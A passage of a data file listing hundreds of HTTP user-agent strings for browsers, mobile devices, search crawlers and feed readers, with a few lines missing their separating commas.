"Baiduspider ( http://www.baidu.com/search/spider.htm)",
"Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)"
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)"
"BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)",
"BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)"
"BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105",
"BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102",
"BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0",
"BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123",
"Bloglines/3.1 (http://www.bloglines.com)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)"
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)"
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)"
"CSSCheck/1.2.2",
"Dillo/2.0",
"DoCoMo/2.0 SH901iC(c100;TB;W24H12)",
"Download Demon/3.5.0.11",
"ELinks/0.12~pre5-4",
"11.50"
"PHP/7.1"
"Python-urllib/2.7"
"Rome"
"Tiny Tiny RSS/1.15.3 (http://tt-rss.org/)"
"Tiny Tiny RSS/17.12 (http://tt-rss.org/"
"ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)",
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)",
"EmailWolf 1.00",
"everyfeed-spider/2.0 (http://www.everyfeed.com)",
"facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)",
"FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)",
"FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)",
"Gaisbot/3.0 ([email protected]; http://gais.cs.ccu.edu.tw/robot.php)",
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Opera/5.0 (Ubuntu; U; Windows NT 6.1; es; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"
"Opera/5.0 (SunOS 5.8 sun4u; U) [en]"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Googlebot-Image/1.0",
"Googlebot-News",
"Googlebot-Video/1.0",
"Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)",
"grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)",
"Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)",
"HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0",
"HTMLParser/1.6",
"iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)",
"iTunes/9.0.2 (Windows; N)",
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
"iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)",
"Java/1.6.0_13",
"Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0",
"Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)",
"LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1",
"LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"libwww-perl/5.820",
"Links/0.9.1 (Linux 2.4.24; i386;)",
"Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)",
"Links (2.1pre15; Linux 2.4.26 i686; 158x61)",
"Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)",
"Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12",
"Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d",
"Mediapartners-Google",
"Microsoft URL Control - 6.00.8862",
"Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ",
"MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0",
"MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0",
"MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0",
"Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1",
"Mozilla/2.02E (Win95; U)",
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
"Mozilla/3.01Gold (Win95; I)",
"Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS)",
"Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180)",
"Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; winfx; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0) ",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]",
"Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
"Mozilla/4.8 [en] (Windows NT 5.1; U)",
"Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1",
"Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) ",
"Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10"
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7"
"Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)",
